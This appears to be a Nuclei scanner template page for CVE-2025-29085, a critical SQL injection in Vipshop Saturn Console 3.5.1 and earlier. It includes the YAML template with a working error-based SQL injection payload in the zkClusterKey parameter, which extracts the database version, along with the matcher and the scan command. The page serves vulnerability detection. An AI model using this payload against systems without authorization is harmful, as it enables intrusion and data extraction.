Vipshop Saturn Console <= 3.5.1 - SQL Injection via ClusterKey Component
ID: CVE-2025-29085
Severity: critical
Author: iamnoooob,rootxharsh,pdresearch
Tags: cve,cve2025,vipshop,sqli
Description
Section titled “Description”SQL injection vulnerability in vipshop Saturn v.3.5.1 and before allows a remote attacker to execute arbitrary code via /console/dashboard/executorCount?zkClusterKey component.
YAML Source
Section titled “YAML Source”id: CVE-2025-29085
info: name: Vipshop Saturn Console <= 3.5.1 - SQL Injection via ClusterKey Component author: iamnoooob,rootxharsh,pdresearch severity: critical description: | SQL injection vulnerability in vipshop Saturn v.3.5.1 and before allows a remote attacker to execute arbitrary code via /console/dashboard/executorCount?zkClusterKey component. reference: - https://github.com/advisories/GHSA-49v8-p6mm-3pfj - https://gist.github.com/Cafe-Tea/bcef0d7a2bdb5ec8e0d69de852fdc900 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-29085 cwe-id: CWE-89 epss-score: 0.00162 epss-percentile: 0.33866 metadata: verified: true tags: cve,cve2025,vipshop,sqli
http: - raw: - | GET /console/dashboard/executorCount?zkClusterKey=1%27-extractvalue(1,concat(0x0a,version()))--%20- HTTP/1.1 Host: {{Hostname}}
matchers: - type: word part: body words: - "java.sql.SQLException: XPATH syntax error: '"
extractors: - type: regex part: body internal: true name: version group: 1 regex: - "XPATH syntax error: '\\\\n(.*?)'"
- type: dsl dsl: - '"Database Version: " + version'# digest: 4a0a00473045022100e5f99074229046de37679c305d0c65848581bd12c0e8749d558456412a9e734c022037abd8bbfc3c76bcee4902583c990a2403573a5caf5f3311fba343bed6c0a950:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-29085.yaml"